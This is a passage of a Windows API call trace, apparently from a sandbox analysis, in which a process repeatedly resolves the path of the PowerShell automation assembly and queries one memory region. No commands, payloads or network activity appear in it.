lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.585] VirtualQuery (in: lpAddress=0xcbc10, lpBuffer=0xccad0, dwLength=0x30 | out: lpBuffer=0xccad0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.586] VirtualQuery (in: lpAddress=0xcbc10, lpBuffer=0xccad0, dwLength=0x30 | out: lpBuffer=0xccad0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.588] VirtualQuery (in: lpAddress=0xcbc10, lpBuffer=0xccad0, dwLength=0x30 | out: lpBuffer=0xccad0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.589] VirtualQuery (in: lpAddress=0xcbc10, lpBuffer=0xccad0, dwLength=0x30 | out: lpBuffer=0xccad0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.589] VirtualQuery (in: lpAddress=0xcb300, lpBuffer=0xcc1c0, dwLength=0x30 | out: lpBuffer=0xcc1c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.589] VirtualQuery (in: lpAddress=0xcb390, lpBuffer=0xcc250, dwLength=0x30 | out: lpBuffer=0xcc250*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.590] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.590] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.590] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.590] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.591] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.591] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.591] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.591] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.591] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.591] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.591] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.592] VirtualQuery (in: lpAddress=0xcb740, lpBuffer=0xcc600, dwLength=0x30 | out: lpBuffer=0xcc600*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.592] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.592] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.592] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.592] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.593] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x994e574b, Data2=0xaa08, Data3=0x4b8b, Data4=([0]=0x93, [1]=0x95, [2]=0xfa, [3]=0x26, [4]=0xfd, [5]=0x17, [6]=0x25, [7]=0xd2))) returned 0x0 [0135.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.593] GetFullPathNameW (in: 